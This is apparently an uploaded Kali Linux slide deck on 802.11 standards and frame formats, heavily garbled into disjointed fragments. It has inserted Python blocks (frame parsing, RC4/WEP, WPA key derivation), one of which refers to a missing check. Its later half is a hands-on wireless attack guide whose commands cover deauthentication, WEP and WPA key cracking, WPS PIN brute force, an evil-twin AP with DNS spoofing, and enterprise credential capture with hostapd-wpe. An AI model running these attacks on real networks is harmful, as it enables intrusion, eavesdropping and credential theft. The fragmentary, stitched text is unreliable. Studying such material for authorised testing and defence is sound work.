Overview of IEEE 802.11 ae Standards

The document provides information about the Kali Linux operating system and 802.11 wireless networking standards. It describes various aspects of 802.11 including physical layer specifications, media access control protocols, and encryption standards supported.

Uploaded by

kingl3t777

Kali linux




• aircrack-ng suite


• AP
802.11
Working Group / Description
IEEE: Institute of Electrical and Electronics Engineers; the IEEE 802 committees define the LAN and MAN standards
IEEE 802.1 Bridging (networking) and Network Management
IEEE 802.2 LLC
IEEE 802.3 Ethernet
IEEE 802.4 Token Bus
IEEE 802.5 Token Ring (defines the MAC layer for a Token Ring)
IEEE 802.6 MANs
IEEE 802.7 Broadband LAN Using Coaxial Cable
IEEE 802.8 Fiber Optic TAG
IEEE 802.9 Integrated Services LAN
IEEE 802.10 Interoperable LAN Security
IEEE 802.11 a/b/g/n Wireless LAN (WLAN) and Mesh (Wi-Fi Certification)
IEEE 802.12 100BaseVG
IEEE 802.13 Unused
IEEE 802.14 Cable Modems
IEEE 802.15 Wireless PAN


• LLC
• MAC

IEEE 802.11
• 802 11
• IEEE 802.11 The Original WLAN Standard – 1 Mbit/s and 2 Mbit/s, 2.4 GHz RF and IR
• IEEE 802.11a 54 Mbit/s, 5 GHz
• IEEE 802.11b 802.11 Enhancements to Support 5.5 Mbit/s and 11 Mbit/s
• IEEE 802.11c Bridge Operation Procedures
• IEEE 802.11d International (Country to Country) Roaming Extensions
• IEEE 802.11e Quality of Service (QoS), Including Packet Bursting
• IEEE 802.11F Inter-Access Point Protocol
• IEEE 802.11g 54 Mbit/s, 2.4 GHz
• IEEE 802.11h Spectrum Managed 802.11a (5 GHz) for European Compatibility
• IEEE 802.11i Enhanced Security
• IEEE 802.11j Extensions for Japan
• IEEE 802.11k Radio Resource Measurement Enhancements
• IEEE 802.11n Higher Throughput Using Multiple Input, Multiple Output (MIMO) Antennas
• IEEE 802.11p Wireless Access for the Vehicular Environment (WAVE)
• IEEE 802.11r Fast BSS Transition (FT)
• IEEE 802.11s Mesh Networking, Extended Service Set (ESS)
• IEEE 802.11T Wireless Performance Prediction (WPP)
• IEEE 802.11u Internetworking with Non-802 Networks (e.g. Cellular)
• IEEE 802.11v Wireless Network Management
• IEEE 802.11w Protected Management Frames
• IEEE 802.11y 3650 – 3700 MHz Operation in the US
• IEEE 802.11z Direct Link Setup (DLS) Extensions
• IEEE 802.11mb Maintenance of the Standard
• IEEE 802.11aa Robust Streaming of Audio Video Transport Streams
• IEEE 802.11ac Very High Throughput < 6 GHz
• IEEE 802.11ad Very High Throughput, 60 GHz
• IEEE 802.11ae QoS Management
• IEEE 802.11af TV Whitespace
• IEEE 802.11ah Sub 1 GHz
• IEEE 802.11ai Fast Initial Link Setup
• 802.11 – The original WLAN standard
• 802.11a – Up to 54 Mbit/s on 5 GHz
• 802.11b – 5.5 Mbit/s and 11 Mbit/s on 2.4 GHz
• 802.11g – Up to 54 Mbit/s on 2.4 GHz. Backward compatible with 802.11b
• 802.11i – Provides enhanced security
• 802.11n – Provides higher throughput with Multiple Input/Multiple Output (MIMO)
802.11
• 1997
• 1Mbps 2Mbps

• radio frequencies
• Direct-Sequence Spread-Spectrum (DSSS)
• Frequency Hopping Spread-Spectrum (FHSS)
• CSMA/CA; channel capacity C = B · log2(1 + S/N)

• Request to Send/Clear to Send (RTS/CTS)


802.11b
• Complementary Code Keying (CCK)——
• 5.5 and 11Mbit/s
• 2.4GHz band (2.4GHz – 2.485GHz)
• 14 channels
• 22MHz

• Channels 1 to 11 (2.412 GHz – 2.462 GHz)
• Channels 1 to 13 (2.412 GHz – 2.472 GHz)
• Channels 1 to 14 (2.412 GHz – 2.484 GHz)
802.11B
802.11A
• 802.11b

• 5GHz
• 2.4GHz
• 5GHz
• Orthogonal Frequency-Division Multiplexing (OFDM)

• 54Mbps 20MHz

• 5.15-5.35 GHz
• 5.7-5.8 GHz
802.11G
• 2.4GHz
• Orthogonal Frequency-Division Multiplexing (OFDM)
• 802.11a
• 802.11b CCK
• 20/22MHz
802.11N
• 2.4 5 GHz
• 300Mbps 600Mbps
• Multiple-Input Multiple-Output (MIMO)

• 40MHz
• 802.11n
• 20/40MHz

• Infrastructure
• AP SSID
• Ad-Hoc
• STA SSID
• Service Set Identifier (SSID)
• AP 10 Beacon SSID
• SSID
802.11
• Infrastructure
• AP STATION Basic Service Set (BSS)
• AP Distribution System (DS)
• DS AP Extended Service Set (ESS)
AD-HOC
• Independent Basic Service Set (IBSS)
• 2 STAs
• peer to peer
• STA AP
• beacon SSID
• STAs
WIRELESS DISTRIBUTION SYSTEM (WDS)
• DS AP
• Bridging—— AP
• Repeating—— AP STA
MONITOR MODE
• Monitor

• 802.11

• monitor Injection
• kali
• kali
• USB
• TL-WN722N
• dmesg
• iwconfig


• USB
• PCMCIA 16bit 802.11b
• Cardbus 32bit PCMCIA 8.0
• Express Cards
• MiniPCI
• MiniPCI Express
• PCI


• Atheros Realtek

• aircrack-ng suite
• http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
• Aircrack-ng suite
• Alfa Networks AWUS036H
• Realtek 8187
• 1000 mW
• RP-SMA

• dB

• B: the bel, named after Alexander Graham Bell


• dB 2

• dBm 1mW dB
• 3dBm 1
• 10dBm 10
• dBi
• dBd
• dBi

• dB
• 300mW 9dBi 2dBi

• mW

• dBm mW
• dBd

• mW dB

W mW
dBm
dB




• 5dBi vs 9dBi





• 3 4
• 90

• 120


LINUX
802.11
• ieee80211
• iwconfig
• iwlist
• mac80211
• iw

• ifconfig
• iwconfig
• iw list

• iwlist wlan2 frequency
• iw list
• AP
• iw dev wlan2 scan | grep SSID
• iw dev wlan2 scan | egrep "DS Parameter set|SSID"
• iwlist wlan2 scanning | egrep "ESSID|Channel"

• service network-manager stop
• iw dev wlan2 interface add wlan2mon type monitor
• tcpdump -s 0 -i wlan2mon -p
• iw dev wlan2mon interface del
802.11

• https://www.kernel.org/doc/htmldocs/80211/index.html

• http://linuxwireless.org/en/users/Drivers/
RADIOTAP
RADIOTAP
• 802.11 802.11 Radiotap
• Linux API Radiotap
• 802.11 802.11 Radiotap
MAC Radiotap
• Radiotap 802.11

RADIOTAP
• Header data
• Version (8 bit): always 0
• Pad (8 bit)
• Length (16 bit): total length of the radiotap header; the 802.11 frame starts right after it
• Present (32 bit): bitmap of the data fields that follow
• Data
• Ext bit (bit 31 of Present): 1 = another Present word follows, 0 = this is the last one
• MAC
802.11
802.11
• DU Data Unit
• Encapsulation
• SDU Service Data Unit / PDU Protocol Data Unit
• MSDU→MIC → → IV → → MAC →MPDU
• MPDU/PSDU + =PPDU →RF
802.11
• 802.11 MAC
802.11
• Protocol Version (2 bit): 802.11 protocol version, currently 0 (1, 2, 3 unused)
• Type (2 bit): 3 frame types
• 0 = Management
• 1 = Control
• 2 = Data
• SubType (4 bit)
802.11
802.11
• To DS / From DS (1 bit each)
• The To DS / From DS combination decides how the 4 MAC address fields are interpreted
• 0x00: IBSS, Management and Control frames; STSL (Station to Station Link), STA to STA without an AP
• 0x01 (To DS): Data frame from STA to AP
• 0x02 (From DS): Data frame from AP to STA
• 0x03 (both set): AP to AP in a WDS (Wireless Distribution System) or Mesh (MP); uses Address 4
802.11
• More Fragments (1 bit):
• 1 = more fragments of this Data or Management frame follow

• Retry (1 bit):
• 1 = this Data or Management frame is a retransmission

• Power Mgmt (1 bit): active mode (0) / power-save mode (1)


• STA AP 1 AP
STA Data AP
802.11
• More Data (1 bit)
• Set to 1 when the AP still holds buffered MSDUs for the STA
STA STA AP PS-Poll AP
AP /
• Protected Frame (1 bit)
• Set to 1 when the MSDU of a Data or Management frame is encrypted (e.g. under the PSK)
Frame#3 0
• Order 1bit
• QoS 1 0
802.11
• Duration/ID 16bit
• Control Type/SubType
• PS-Poll (type 1, subtype 10): the field carries the STA's AID (association identity)

NAV Network Allocation Vector
802.11
• MAC Layer Address
• 4 address fields. The Basic Service Set ID (BSSID) identifies a BSS at layer 2; in infrastructure mode the BSSID is the AP's MAC address, so each AP's BSS has its own BSSID
802.11
• Sequence Control 16bit
• Sequence Number Fragment Number
• Sequence Number: 0–4095, incremented by 1 for each new frame
• Fragment Number: 0–15, incremented by 1 for each fragment
802.11
• Frame Body
• MSDU: maximum 2304 bytes (2048 + 256)
• WEP: +8 bytes → 2312 bytes
• TKIP (WPA1): +20 bytes → 2324 bytes
• CCMP (WPA2): +16 bytes → 2320 bytes

• Control Frame Body


802.11
• FCS (32 bit)
• CRC computed over the MAC header and Frame Body = FCS (Frame Check Sequence)
ACK FCS /
• wireshark FCS
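As an added example (not code from the slides), the following Python parses the radiotap header described earlier and the 802.11 MAC header described above (Frame Control, Duration/ID, the addresses as selected by To DS / From DS, Sequence Control) from a monitor-mode capture; it follows the radiotap Ext bit to further Present words, handles the short Control-frame headers (ACK, and PS-Poll with its AID in the Duration/ID field) and does not check the FCS. The sample bytes are constructed for the example.

```python
import struct

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}

def parse_radiotap(buf: bytes) -> dict:
    # Fixed radiotap header: version (8 bit, must be 0), pad (8 bit), length
    # (16 bit LE) and a 32-bit 'present' bitmap; bit 31 (Ext) = another bitmap follows.
    version, _pad, length = struct.unpack_from("<BBH", buf, 0)
    if version != 0 or length > len(buf):
        raise ValueError("bad radiotap header (version %d, length %d)" % (version, length))
    present, off = [], 4
    while True:
        word, = struct.unpack_from("<I", buf, off)
        present.append(word)
        off += 4
        if not word & (1 << 31):
            break
    return {"version": version, "length": length, "present": present}

def parse_mac_header(frame: bytes) -> dict:
    # Frame Control (2 bytes) and Duration/ID (2 bytes) are common to every frame.
    fc0, fc1, duration = struct.unpack_from("<BBH", frame, 0)
    to_ds, from_ds = fc1 & 1, (fc1 >> 1) & 1
    hdr = {"version": fc0 & 3, "type": FRAME_TYPES[(fc0 >> 2) & 3], "subtype": fc0 >> 4,
           "to_ds": to_ds, "from_ds": from_ds, "retry": (fc1 >> 3) & 1,
           "pwr_mgmt": (fc1 >> 4) & 1, "more_data": (fc1 >> 5) & 1,
           "protected": (fc1 >> 6) & 1, "duration": duration, "RA": frame[4:10].hex(":")}
    if hdr["type"] == "control":
        # Control frames carry only RA (ACK, CTS) or RA + TA (PS-Poll, RTS); in a
        # PS-Poll (subtype 10) the Duration/ID field holds the station's AID.
        if hdr["subtype"] in (10, 11):
            hdr["TA"] = frame[10:16].hex(":")
        if hdr["subtype"] == 10:
            hdr["AID"] = duration & 0x3FFF
        return hdr
    # Data/Management: Addr1-3 then Sequence Control; the meaning of the addresses
    # depends on To DS / From DS, and Address 4 exists only for WDS (both bits set).
    roles = {(0, 0): ("DA", "SA", "BSSID"), (1, 0): ("BSSID", "SA", "DA"),
             (0, 1): ("DA", "BSSID", "SA"), (1, 1): ("RA", "TA", "DA")}[(to_ds, from_ds)]
    for i, role in enumerate(roles):
        hdr[role] = frame[4 + 6 * i: 10 + 6 * i].hex(":")
    seq_ctrl, = struct.unpack_from("<H", frame, 22)
    hdr["fragment"], hdr["sequence"] = seq_ctrl & 0xF, seq_ctrl >> 4
    if to_ds and from_ds:
        hdr["SA"] = frame[24:30].hex(":")
    return hdr

def parse_monitor_frame(buf: bytes) -> dict:
    # A monitor-mode capture is the radiotap header followed by the raw 802.11 frame.
    rt = parse_radiotap(buf)
    return dict(parse_mac_header(buf[rt["length"]:]), radiotap=rt)

# Constructed sample: 8-byte radiotap header (no optional fields) in front of a
# data frame from a STA to its AP (To DS = 1), duration 44, sequence number 33.
SAMPLE = bytes.fromhex("0000080000000000"      # radiotap: version 0, pad 0, len 8, present 0
    "0801" "2c00"                               # FC: type 2 (data) subtype 0, To DS=1; duration 44
    "001122334455" "66778899aabb" "ccddeeff0011" "1002")  # Addr1 BSSID, Addr2 SA, Addr3 DA; frag 0, seq 33
```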
CONTROL FRAME
CONTROL FRAME

ACK
• ACK
• ACK
• ACK

• Type/Subtype 1/13
PS-POLL
• RF



PS-POLL
• AID——Association ID
• STA
• AP AP
• Beacon TIM traffic indication map
• AID
• STA AID
• STA PS-Poll AP
• ACK
• ACK AP
• STA
• STA
PS-POLL
• AP PS-Poll


• AID ID
• BSSID STA AP
• TA STA
RTS/CTS
• RTS/CTS CSMA/CA



RTS/CTS
• Node1 Request to Send Node2
• Node2 Clear to Send Node1
• Node1
• Node2 ACK Node1
RTS/CTS
• CSMA/CD
• CSMA/CA

RTS/CTS
• RTS: 20 bytes

• CTS: 14 bytes
MANAGEMENT FRAME
MANAGEMENT FRAME
• STA AP
BEACON FRAMES
• AP BSSID

• 102.4ms
• 1024 microseconds 60
• SSID
• AP SSID
BEACON FRAMES
BEACON FRAMES

IBSS status bit
• 0: infrastructure
• 1: ad-hoc

Privacy

WEP

ESSID

• 802.11g supported rates: 1–54 Mbit/s


11
PROBE REQUEST FRAMES
• STA AP
• AP
• AP
PROBE RESPONSE FRAMES
• AP ESSID AP
AUTHENTICATION FRAMES
AUTHENTICATION FRAMES
• Authentication Algorithm
• 0: Open System
• 1: Shared Key

• Authentication Seq
• Seq

1-65535

Challenge text

• Status Code /
ASSOCIATION/REASSOCIATION FRAMES
• STA
• Association Request
• Reassociation Request
• Association Response
ASSOCIATION REQUEST FRAMES
REASSOCIATION REQUEST FRAME
ASSOCIATION RESPONSE
• AP STA
• /
DISASSOCIATION/DEAUTHENTICATION
• AP
• 2
DISASSOCIATION/DEAUTHENTICATION
ATIM FRAMES
• ad-hoc
• STA
DATA FRAME
DATA FRAMES
AUTHENTICATION FRAMES

• DATA Frame

• Null data frame
• MAC FCS
• STA
• Probe
• STA probe AP
• AP Response
• Authentication
• STA AP

• AP STA
• Association
• STA
• AP

WEP
• Beacon WEP
• STA Probe
• AP Probe Response WEP
WPA
• AP Beacon WPA
• 802.11
• WPA1
WEP OPEN
• WEP Open open
• WEP

• AP STA


WEP PSK
• STA sends an authentication request
• AP replies with a Challenge
• STA encrypts the Challenge with the PSK and sends it to the AP
• AP decrypts it with the PSK and compares it with the original Challenge

• open PSK
WEP

• STA AP
• AP STA
• AP
• STA AP ESSID
• AP

• 802.11

• Wired Equivalent Privacy (WEP)


• 802.11

• Wi-Fi Protected Access WPA WEP


• WPA2 802.11i
OPEN

• STA AP
WEP
• Rivest Cipher 4 (RC4)
• CRC32 integrity check
• 24-bit initialization vector (IV)

• 64-bit key
• 24-bit IV + 40-bit key
• 128-bit WEP key: 24-bit IV + 104-bit key
RC4
• RSA

• XOR
• XOR
• RC4 key
• IV + key → Key Scheduling Algorithm (KSA)
• Pseudo-Random Generation Algorithm (PRGA)
RC4
RC4
RC4
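An added example (not code from the slides) of the WEP encapsulation the RC4 slides describe: the IV and key are fed to the KSA, the PRGA produces the keystream, and the MSDU with its CRC-32 ICV is XORed with it, which is where the 8-byte WEP overhead in the frame body comes from. Key, IV and MSDU values are constructed for the example.

```python
import zlib

def rc4_ksa(key: bytes) -> list:
    # Key Scheduling Algorithm: permute S[0..255] under the key (for WEP: IV || key).
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_prga(S: list, n: int) -> bytes:
    # Pseudo-Random Generation Algorithm: n keystream bytes from the permutation.
    S, i, j, out = S[:], 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def rc4(key: bytes, data: bytes) -> bytes:
    # Encryption and decryption are the same XOR with the keystream.
    return bytes(a ^ b for a, b in zip(data, rc4_prga(rc4_ksa(key), len(data))))

def wep_encapsulate(key: bytes, iv: bytes, key_id: int, msdu: bytes) -> bytes:
    # Frame body = IV (3) || key id (1) || RC4(IV || key, MSDU || ICV), where the
    # ICV is the CRC-32 of the plaintext: 4 + 4 = the 8-byte overhead (2304 -> 2312).
    assert len(iv) == 3 and len(key) in (5, 13)   # WEP-40 or WEP-104 secret key
    icv = zlib.crc32(msdu).to_bytes(4, "little")
    return iv + bytes([key_id & 3]) + rc4(iv + key, msdu + icv)

def wep_decapsulate(key: bytes, body: bytes):
    # Receiver: rebuild the RC4 seed from the clear-text IV, decrypt, verify the ICV;
    # returns the MSDU, or None when the ICV does not match.
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + key, ct)
    msdu, icv = pt[:-4], pt[-4:]
    return msdu if zlib.crc32(msdu).to_bytes(4, "little") == icv else None
```

Because the IV is only 24 bits, two frames under the same IV and key share a keystream, which the last assertion of the accompanying check illustrates.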
WPA
• Wi-Fi Protected Access
• 802.11i
• Temporal Key Integrity Protocol TKIP
• WPA1 WEP
• Counter Mode with CBC-MAC CCMP
• WPA2
• WPA
• WPA
• WPA 802.1X Radius AAA
WPA1
• 802.11i
• WEP

• 128-bit key, 48-bit IV


• RC4

• TKIP Michael MIC


• WEP CRC32

WPA2
• 802.11i
• Robust Security Network (RSN)
• CCMP TKIP
• AES RC4

WPA


WPA-PSK



• PSK / 802.1X
• /
• TKIP / CCMP
• STA probe


WPA
• Extensible Authentication Protocol (EAP)
• EAP-TLS
• EAP-TTLS
• PEAP

• AP Radius Server
• Radius Server “Radius Accept”
• Master Key MK
• AP EAP STA

• AP

pairwise key PTK


group key GTK


PMK

• MK TLS-PRF PMK

• radius AP
• AP EAP STA
• PSK mode
• PMK = hash of ESSID + PSK, iterated 4096 times (PBKDF2)
• STA and AP both derive the same PMK
• 256 bits (32 bytes)
• PTK
• Derived from the PMK with PRF-X, built on HMAC-SHA1


• PTK derivation (4-way handshake)
• AP sends its ANonce to the STA
• STA generates an SNonce and computes the PTK
• STA sends the SNonce, with a MIC computed under the PTK, to the AP
• AP computes the PTK from the SNonce
• AP computes the MIC and compares it with the received MIC
• A matching MIC proves the STA holds the PMK
• AP sends the GTK to the STA
• STA replies with an ACK
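An added example (not the slides' own code) of the derivation described above: PBKDF2-HMAC-SHA1 over the passphrase and ESSID gives the 32-byte PMK, PRF-X (HMAC-SHA1) expands it with both MAC addresses and both nonces into the PTK, and the AP checks the MIC on handshake message 2 with the KCK. The EAPOL-Key frame builder and all addresses and nonces are constructed for the example.

```python
import hashlib
import hmac

MIC_OFF = 81  # offset of the 16-byte Key MIC field inside an EAPOL-Key frame

def derive_pmk(passphrase: str, essid: str) -> bytes:
    # WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations) -> 32 bytes
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def prf_x(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-X: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ...
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) ||
    # min(ANonce,SNonce) || max(ANonce,SNonce)); the ordering makes both sides agree.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_x(pmk, b"Pairwise key expansion", data, 64)
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}

def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    # The MIC covers the whole EAPOL-Key frame with the MIC field zeroed:
    # Key Descriptor Version 1 (TKIP) = HMAC-MD5, version 2 (CCMP) = HMAC-SHA1-128.
    zeroed = eapol[:MIC_OFF] + bytes(16) + eapol[MIC_OFF + 16:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    # Constructed minimal handshake message 2 (no Key Data): EAPOL header, descriptor
    # type 2, Key Info 0x010a (version 2, pairwise, MIC), key length 16, replay
    # counter 1, SNonce, zero IV/RSC/ID, MIC, Key Data Length 0.
    body = (b"\x02\x01\x0a\x00\x10" + (1).to_bytes(8, "big") + snonce + bytes(32)
            + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body

def verify_msg2(passphrase, essid, aa, spa, anonce, snonce, eapol, key_version=2):
    # The AP's check on message 2: rebuild the PTK from its own PMK, its ANonce and
    # the received SNonce, recompute the MIC and compare it in constant time.
    kck = derive_ptk(derive_pmk(passphrase, essid), aa, spa, anonce, snonce)["KCK"]
    return hmac.compare_digest(eapol_mic(kck, eapol, key_version),
                               eapol[MIC_OFF:MIC_OFF + 16])
```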

• Temporal Key Integrity Protocol (TKIP) 4
• Counter Mode with CBC-MAC (CCMP) 5
• Wireless Robust Authenticated Protocol (WRAP) 6
AIRCRACK-NG


AIRMON-NG

• airmon-ng check
• airmon-ng check kill
• airmon-ng start wlan2 3
• iwlist wlan2mon channel
• airmon-ng stop wlan2mon
AIRODUMP-NG

• airodump-ng wlan2mon
• airodump-ng wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap
• aireplay-ng -9 wlan2mon
• aireplay-ng
AIRODUMP-NG
• airodump-ng wlan2mon
• airodump-ng wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap
• airodump-ng wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap --ivs
AIRODUMP-NG
• BSSID AP MAC
• PWR
-1 STA
• RXQ 10

• Beacons AP beacon
• #Data WEP IV
• #/s 10
• CH beacon
• MB AP
• ENC WEP WPA WPA2 OPEN
AIRODUMP-NG
• CIPHER CCMP TKIP WEP40 WEP104
• AUTH MGT PSK SKA OPEN
• ESSID AP airodump probe
association request AP
• STATION STA MAC
• Lost sequence number 10 STA



• Packets STA
• Probes STA ESSID
AIRODUMP-NG
• AP STA
• BIOS
• managed
• network-manager
• rmmod modprobe
• airodump-ng
• airmon-ng check kill
• wpa_supplicant
AIREPLAY-NG


• WEP WPA
• 10

• (-i)
• pcap (-r)
AIREPLAY-NG
• aireplay-ng <options><interface name>
• Filter 0 1
AIREPLAY-NG
• Replay
AIREPLAY-NG
• Aireplay-ng
• AP
• "write failed: Cannot allocate memory wi_write(): illegal seek"
• Broadcom bcm43xx b43
• "rtc: lost some interrupts at 1024Hz"
• aireplay-ng
• -h MAC MAC
• macchanger
• 00:11:11:11:11:11 / -h 00:22:22:22:22:22
AIREPLAY-NG

• AP

• AP probe
• AP 30

AIREPLAY-NG

• aireplay-ng -9 wlan2mon
• AP/ SSID
• aireplay-ng -9 -e leven -a EC:26:CA:FA:02:DC wlan2mon
AIREPLAY-NG
• card to card

• -i AP
• 5/7 Failed
• MAC MAC
MAC
MAC
• MAC
• MAC

• AP
• AP
• Open

• MAC
WEP
WEP
• WEP
• IV
• 224 IV
• IV IV
• ARP IV
• IV wep
WEP
• monitor

• Deauthentication XOR
• XOR AP
• ARP
• Deauthentication ARP
• DATA
FAKE AUTHENTICATION
• WEP AP
• ARP
• aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>
• aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your
MAC><interface>
• 6000 reauthentication
• -o 1
• -q 10 10 keep-live
FAKE AUTHENTICATION
• AP MAC OUI
• MAC
• Denied (Code 1) is WPA in use
• WPA/WPA2 Fake authentication
• MAC
• AP

DEAUTHENTICATION
• AP
• ARP AP IV
• WPA 4

• aireplay-ng -0 0 -a <AP MAC> -c <Client MAC> <interface name>


• -c
• 128 64 AP 64

DEAUTHENTICATION

• b n g

ARP
• ARP AP
• AP IV

• aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name>


• -h / MAC
• Airodump-ng data
• 64bit 25
• 128bit 150
WEP
• aircrack-ng wep.cap
WPA
HTTP://ETUTORIALS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/
WPA PSK

• WPA WEP

• CPU


• Crunch
• Kali
WPA PSK
• PSK
• monitor

• Deauthentication 4

WPA PSK
• AP WPA
• monitor

• probe ESSID AP


AIROLIB
• ESSID
• PMK
• PMK PTK

• SQLite3
AIROLIB
• echo kifi > essid.txt
• airolib-ng db --import essid essid.txt
• airolib-ng db --stats
• airolib-ng db --import passwd <wordlist>
• WPA
• airolib-ng db --batch
• PMK
• aircrack-ng -r db wpa.cap
JTR
• John the ripper


• JTR
• /etc/john/john.conf
• [List.Rules:Wordlist]
• $[0-9]$[0-9]$[0-9]
JTR

• john --wordlist=password.lst --rules --stdout | grep -i Password123

• john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w - wpa.cap

COWPATTY
• WPA

• cowpatty -r wpa.cap -f password.lst -s kifi
• PMK
• genpmk -f password.lst -d pmkhash -s kifi
• cowpatty -r wpa.cap -d pmkhash -s kifi
PYRIT
• airolib cowpatty PMK

• CPU pyrit GPU PMK
• Airodump
• airodump
• WAP
• pyrit -r wlan2mon -o wpapyrit.cap stripLive
• pyrit -r wpapyrit.cap analyze
• airodump
• pyrit -r wpa.cap -o wpapyrit.cap strip
PYRIT

• pyrit -r wpapyrit.cap -i password.lst -b <AP MAC> attack_passthrough

• SQL PMK
• pyrit eval
• pyrit -i password.lst import_passwords
• ESSID pyrit -e kifi create_essid
• PMK pyrit batch GPU
• pyrit -r wpapyrit.cap -b <AP MAC> attack_db
WPS
WPS WIRELESS PROTECTED SETUP
• WPS WiFi 2006
• PIN PSK

• The 8-digit PIN is verified as 2 halves of 4 digits

• 2011
• 4
• First half: 10^4 = 10,000 possibilities; second half: 1,000, because the 8th digit is a checksum
• 11,000 attempts at most
• PSK: 62^8 = 218,340,105,584,896 possibilities

WPS WIRELESS PROTECTED SETUP
• Linksys WPS
• WEB WPS

• 4-10
• PSK
• PIN
• C83A35
• 00B00C
WPS WIRELESS PROTECTED SETUP
• WPS AP
• wash -C -i wlan0mon
• airodump-ng wlan0mon --wps

• PIN
• reaver -i wlan0mon -b <AP mac> -vv
• PIN
• reaver -i wlan0mon -b <AP mac> -vv -K 1
• pixiewps

• reaver -i wlan0mon -b <AP mac> -vv -p 88888888


WPS WIRELESS PROTECTED SETUP

• AP WPS

• wifite
EVIL TWIN AP / ROGUE AP
EVIL TWIN AP / ROGUE AP

• 20%
EVIL TWIN AP / ROGUE AP
• airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon
• apt-get install bridge-utils
• brctl addbr bridge
• brctl addif Wifi-Bridge eth0
• brctl addif Wifi-Bridge at0
• ifconfig eth0 0.0.0.0 up
• ifconfig at0 0.0.0.0 up
• ifconfig bridge 192.168.1.10 up
• route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
EVIL TWIN AP / ROGUE AP
• echo 1 > /proc/sys/net/ipv4/ip_forward

• dnsspoof -i bridge -f dnsspoof.hosts


• /usr/share/dsniff/dnsspoof.hosts
• apache2ctl start
EVIL TWIN AP / ROGUE AP
• 3vilTwinAttacker
• git clone https://github.com/P0cL4bs/3vilTwinAttacker.git
• cd 3vilTwinAttacker
• chmod +x installer.sh
• ./installer.sh --install

• iptables
WPA
• hostapd-wpe
• FreeRADIUS-wpe
• EAP-FAST/MSCHAPv2 (Phase 0)
• PEAP/MSCHAPv2
• EAP-TTLS/MSCHAPv2
• EAP-TTLS/MSCHAP
• EAP-TTLS/CHAP
• EAP-TTLS/PAP
WPA

• git clone https://github.com/OpenSecurityResearch/hostapd-wpe
• apt-get install libssl-dev libnl-dev
• libnl1 libnl-dev kali2.0
• wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-dev_1.1-7_amd64.deb
• wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl1_1.1-7_amd64.deb
• dpkg -i libnl1_1.1-7_amd64.deb
• dpkg -i libnl-dev_1.1-7_amd64.deb
WPA
• wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
• tar -zxf hostapd-2.2.tar.gz
• cd hostapd-2.2
• patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
• cd hostapd
• make
WPA

• cd ../../hostapd-wpe/certs
./bootstrap
• service network-manager stop
• airmon-ng check kill

• ifconfig wlan2 up
• AP
• cd ../../hostapd-2.2/hostapd
./hostapd-wpe hostapd-wpe.conf
WPA
• asleap -C challenge -R response -W <Dictionary_File>
AIRCRACK-NG SUITE
AIRDECAP-NG
• 802.11
• airdecap-ng -b <AP MAC> 1.pcap
• WEP
• airdecap-ng -w <WEP key> -b <AP MAC> 1.pcap
• AP
• WPA
• airdecap-ng -e kifi -p <PSK> -b <AP MAC> 1.pcap
• 4
AIRSERV-NG

• /


• airserv-ng -p 3333 -d wlan2mon

• airodump-ng 192.168.1.1:3333
• C/S
AIRTUN-NG
• wIDS
• BSSID


• Repeat / Replay
AIRTUN-NG
• wIDS
• WEP: airtun-ng -a <AP MAC> -w SKA wlan2mon
• WPA: airtun-ng -a <AP MAC> -p PSK -e kifi wlan2mon
• ifconfig at0 up

• AP wIDS 2 AP
• WPA: airtun-ng -a <AP MAC> -p PSK -e kifi1 wlan2mon
• ifconfig at1 up
• AP airodump-ng -c 1,11 wlan2mon
AIRTUN-NG
• Repeat
• WDS/Bridge

• monitor
• airtun-ng -a <AP MAC> --repeat --bssid <AP MAC> -i wlan0mon wlan2mon
• wlan0mon

• wlan2mon
• -a
• --bssid
AIRTUN-NG
• Replay
• CAP
• airtun-ng -a <Source MAC> -r 1.cap <interface>
• besside-ng
• fern-wifi-cracker
• kismet
• kismet*.nettxt
• kismet*.pcapdump

• gpsd -n -N -D4 /dev/ttyUSB0


• giskismet -x Kismet-*.netxml
• giskismet -q "select * from wireless" -o gps.kml
• Google
